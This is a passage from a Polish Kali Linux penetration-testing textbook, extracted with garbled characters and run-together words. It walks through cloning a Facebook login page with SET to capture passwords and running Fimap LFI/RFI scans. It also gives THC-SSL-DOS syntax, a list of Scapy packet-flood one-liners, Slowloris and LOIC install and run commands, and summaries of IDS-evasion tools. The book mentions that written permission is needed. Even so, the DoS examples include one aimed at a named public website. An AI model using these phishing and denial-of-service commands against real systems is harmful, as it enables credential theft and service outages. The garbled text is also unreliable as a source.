Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania
Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y
W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
252
Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook
Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony
Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)
Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-
myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)
Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
253
Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
254
Fimap
Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)
Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia
fimap --install -plugins
Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)
Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
255
ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom
Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie
fimap -u httpwwwthesecuritybloggercom
Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity
bloggercom jest odporna na tego typu ataki
Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
256
i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)
Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe
Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze
dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego
funkcjonowania
Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki
Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based
Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew
Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
257
Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych
Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu
W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux
Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej
THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
258
Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca
thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept
W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej
Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
259
ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych
Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece
W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia
send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)
Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
260
Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy
Nieprawid owa wersja protoko u IP
send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)
Nieprawid owa suma kontrolna pakietu TCP
send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)
send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)
send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)
Ustawiona tylko flaga FIN
send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)
Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2
send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka pakietu
send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)
ICMP Flood
send(IP(dst=10001)ICMP()iface=eth0count=2000)
Nieprawid owa suma kontrolna pakietu IP
send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)
Fragmentacja pakietoacutew IP
send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
261
roacuted owy adres IP taki sam jak docelowy adres IP
send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)
Brak pakietu warstwy L4
send(IP(dst=10001 src=10203040) iface=eth0 count=2000)
Jednocze nie ustawione flagi SYN i FIN
send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)
Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)
Slowloris
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
262
Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym
programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco
czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera
Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne
Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris
Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej
perl slowlorispl
W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)
perl slowlorispl -dns thesecuritybloggercom
Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)
Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)
Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
263
LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
264
narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki
Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa
Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej
apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs
Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej
mkdir loic
Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej
wget httpsrawgithubcomnicolargoloicinstaller masterloicsh
Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie
chmod 777 loicsh
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
265
Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej
loicsh install
Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie
loicsh update
Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie
loicsh run
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
266
U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny
Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP
Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding
Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane
DNSChef
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
267
Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne
Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera
SniffJoke
SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
268
SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force
Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)
Sk adnia wywo ania polecenia siege jest nast puj ca
siege [opcje] ltadres URL celugt
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
269
Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-
nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku
InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
270
wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS
TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych
Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci
